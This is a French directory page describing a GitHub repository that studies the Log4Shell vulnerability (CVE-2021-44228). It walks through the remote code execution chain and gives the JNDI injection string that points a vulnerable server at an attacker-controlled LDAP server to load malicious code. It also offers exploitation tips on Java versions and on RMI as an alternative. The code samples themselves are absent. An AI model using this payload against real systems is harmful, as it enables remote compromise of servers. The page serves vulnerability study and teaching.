Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228 — Étude de vulnérabilité CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/asd58584388/cve-2021-44228
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubasd58584388/cve-2021-44228

CVE-2021-44228

Étude de vulnérabilité CVE-2021-44228

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Analyse de CVE-2021-44228

Comment ça marche ?

Ci-dessous un processus détaillé d'un cas d'injection à distance par exploitation de la vulnérabilité log4shell. Tout d'abord, il y a 3 parties à connaître :

  1. Log4j2 permet de journaliser des données à l'aide d'une fonctionnalité appelée substitution de recherche dans les messages, où les messages de journal peuvent inclure des données extraites dynamiquement de diverses sources. (Il prend en charge JNDI Lookup)

  2. JNDI Lookup : Permet de récupérer des données via l'API Java Naming and Directory Interface (JNDI), qui peut interagir avec différents services d'annuaire

  3. LDAP (Lightweight Directory Access Protocol) : Utilisé principalement pour accéder aux services d'informations d'annuaire et les gérer sur un réseau.


Voici un exemple simple d'exécution de code à distance :

  1. Le hacker met en place à la fois un serveur LDAP (accessible via le protocole LDAP, contenant une référence vers le code Java malveillant) et un serveur HTTP (l'endroit où est stocké le code malveillant)

    1. Mettre en place un serveur HTTP dans le répertoire contenant le code malveillant compilé :

    2. Mettre en place un serveur LDAP qui stocke la référence :

      ldap

  2. Le hacker envoie une entrée malveillante (${jndi:ldap://LDAPSERVER IP:PORT/code}) au système logiciel sur lequel log4j2 est installé

  3. Log4j2 utilise la fonctionnalité de lookup pour envoyer une requête au serveur LDAP

  4. Le serveur LDAP redirige les requêtes vers les serveurs HTTP via les références de code Java stockées dans les serveurs LDAP

  5. Le serveur HTTP renvoie le code malveillant au système logiciel, qui exécute ensuite le code malveillant.

Code malveillant :

Exécution du code malveillant réussie :


IMPORTANT :

  1. Nous ne sommes pas limités à l'utilisation d'un serveur LDAP pour effectuer l'exécution de code à distance ; nous pouvons également utiliser d'autres méthodes (comme RMI) tant que log4j2 effectue avec succès la substitution de recherche dans les messages et exécute le code malveillant

  2. Différentes versions de Java peuvent rendre le processus d'exploitation différent (ici nous utilisons Java 1.8u112).

  3. Il est recommandé d'utiliser la même version de Java dans le code malveillant que celle du logiciel (serveurs utilisant log4j2), ou, au plus, une version non supérieure à celle du logiciel.

  4. Le code de lookup dans Log4j2 :

Télécharger l’outil